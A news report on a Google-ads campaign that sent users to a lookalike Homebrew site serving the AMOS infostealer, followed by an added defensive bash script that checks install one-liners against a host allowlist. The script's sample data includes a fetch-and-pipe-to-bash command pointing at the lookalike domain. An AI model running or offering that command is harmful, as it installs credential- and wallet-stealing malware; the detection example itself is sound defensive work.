Cybercriminals are using Google ads to spread malware, directing Mac and Linux users to a fake Homebrew website that serves an infostealer.
This malware campaign is designed to steal sensitive information, including credentials, browser data, and cryptocurrency wallets.
The campaign was spotted by security expert Ryan Chenkie, who raised the alarm on X about the fake site and the risk it poses to anyone who copies its install command. The payload is AmosStealer (also known as Atomic).
Built specifically for macOS, this information stealer is sold to cybercriminals on a subscription basis for $1,000 per month.
For those unaware, Homebrew is a free and open-source package manager that simplifies installing software on macOS and Linux.
However, it has recently become a target for malvertising, following the pattern of earlier campaigns that pushed fake Google Meet pages.
The attackers ran a deceptive Google advertisement that displayed the legitimate Homebrew URL, “brew.sh,” so that unsuspecting users would click it.
Clicking the ad redirected users to a lookalike site at “brewe.sh” that mimicked the real one. The fake page told visitors to install Homebrew by pasting a command into their Terminal or a Linux shell prompt; when executed, the command installed the malware instead of Homebrew. The trick works because Homebrew’s official installer is itself a one-line command that fetches a script from the network and pipes it straight into bash, so a copied page whose command points at a different host is all the attacker needs: nothing in the one-liner verifies where the script came from.
Security researcher JAMESWT identified the malware dropped in this case as Amos, a potent information stealer capable of targeting over 50 cryptocurrency extensions, desktop wallets, and web browser data.
Homebrew’s project leader, Mike McQuaid, acknowledged the issue and expressed frustration over Google’s inability to prevent these scams.
“This seems taken down now. But it keeps happening again and again, and Google appears to prioritize revenue from scammers. Please share this widely so Google can address it permanently,” McQuaid tweeted.
Although the malicious ad has been removed, the threat remains, as hackers can use other redirection domains to continue their campaigns.
Homebrew users are advised to be cautious with Google-sponsored ads and to confirm they are on a project’s or company’s official website before downloading software or entering sensitive information.
The practical defenses are simple: bookmark the official sites of trusted projects like Homebrew and go to them directly, avoid clicking sponsored ads for software downloads, and check that the URL in the address bar matches the legitimate domain exactly (a lookalike such as brewe.sh differs by a single character).
Before running any install one-liner, compare it with the command published in the project’s own documentation, look at the host it downloads from, and prefer saving the script to a file and reading it rather than piping it directly into a shell.
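The following shell script is an added example, not code from the article or from the Homebrew project. It implements the check described above for the copy-and-paste install pattern this campaign abused: pull the download URL out of an install one-liner, extract its host, and compare that host exactly against an allowlist, so a lookalike such as brewe.sh or a subdomain trick like brew.sh.evil.example is rejected. The allowlist, the legitimate-looking command and the fake command are constructed for the example; brewe.sh is the domain named in the article, but the path on the fake site is assumed.

```bash
#!/usr/bin/env bash
# Added example: check where an install one-liner fetches its script from
# before you run it. Allowlist and sample commands are constructed here.

# Hosts the genuine Homebrew installer is served from (assumption: allowlist
# chosen for this example from Homebrew's published install command).
ALLOWED_HOSTS="brew.sh raw.githubusercontent.com github.com"

# Print the first http(s) URL found in a command string, or nothing.
extract_url() {
  printf '%s\n' "$1" | grep -oE 'https?://[^"'"'"' )]+' | head -n 1
}

# Print the host component of a URL (scheme, userinfo, port and path removed).
url_host() {
  local rest="${1#*://}"        # strip scheme
  rest="${rest%%/*}"            # strip path
  rest="${rest##*@}"            # strip userinfo
  printf '%s\n' "${rest%%:*}"   # strip port
}

# Return 0 if the host is on the allowlist, 1 otherwise. The comparison is an
# exact string match: a substring or regex check would accept brew.sh.evil.example.
host_allowed() {
  local host="$1" h
  for h in $ALLOWED_HOSTS; do
    [ "$host" = "$h" ] && return 0
  done
  return 1
}

# Inspect a pasted command: print a verdict, return 0 (ok) or 1 (reject).
check_install_command() {
  local cmd="$1" url host
  url=$(extract_url "$cmd")
  if [ -z "$url" ]; then
    echo "REJECT: no URL found in command"
    return 1
  fi
  host=$(url_host "$url")
  if host_allowed "$host"; then
    echo "OK: $host is on the allowlist ($url)"
    return 0
  fi
  echo "REJECT: $host is not an allowlisted host ($url)"
  return 1
}

# Safer than curl | bash: refuse unknown hosts, save the script to a file,
# print its digest and leave the decision to run it to the operator.
# Not exercised below because it needs network access.
fetch_for_review() {
  local url="$1" host out
  host=$(url_host "$url")
  if ! host_allowed "$host"; then
    echo "REJECT: refusing to fetch from $host" >&2
    return 1
  fi
  out=$(mktemp) || return 1
  curl -fsSL --proto '=https' -o "$out" "$url" || return 1
  shasum -a 256 "$out"
  echo "Saved to $out; read it before running: bash $out"
}

# Constructed sample commands. LEGIT_CMD mirrors the documented Homebrew
# installer; FAKE_CMD is what a lookalike page could serve (path assumed).
LEGIT_CMD='/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
FAKE_CMD='/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'

for cmd in "$LEGIT_CMD" "$FAKE_CMD"; do
  check_install_command "$cmd" || true   # '|| true' so a rejection does not abort under set -e
done
```

The host allowlist is deliberately strict rather than clever: exact matching is what stops the one-character lookalike the campaign used, and it is cheap to extend when a project moves its installer. `fetch_for_review` shows the habit the advice above recommends, namely saving the script and reading it instead of piping an unseen download into bash.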